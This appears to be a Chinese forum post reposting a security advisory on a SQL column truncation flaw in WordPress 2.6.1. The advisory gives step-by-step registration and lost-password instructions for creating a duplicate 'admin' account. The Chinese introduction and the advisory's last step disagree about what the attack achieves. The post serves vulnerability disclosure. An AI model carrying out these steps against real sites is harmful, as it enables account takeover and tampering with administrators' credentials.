|
|
前段时间我分析了这种漏洞,今天出来了一个活生生的例子
我的博客文章在:
关于MySQL的SQL Column Truncation Vulnerabilities
今天出的这个wordpress漏洞如下:
注册一个用户名为: admin(55个空格)x
这样的用户名,就可以通过取回密码拿到原管理员的密码了。
Vulnerable Systems:
* WordPress version 2.6.1
Exploit:
1. Go to URL: server.com/wp-login.php?action=register
2. Register as:
login: admin x (the user admin[55 space chars]x)
email: your email
Now, we have duplicated 'admin' account in database
3. Go to URL: server.com/wp-login.php?action=lostpassword
4. Write your email into field and submit this form
5. Check your email and go to reset confirmation link
6. Admin's password changed, but new password will be send to correct admin email
Additional Information:
The information has been provided by irk4z.
The original article can be found at: http://irk4z.wordpress.com/ |
|
狗仔卡
发表于 2010-2-4 11:28:12
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡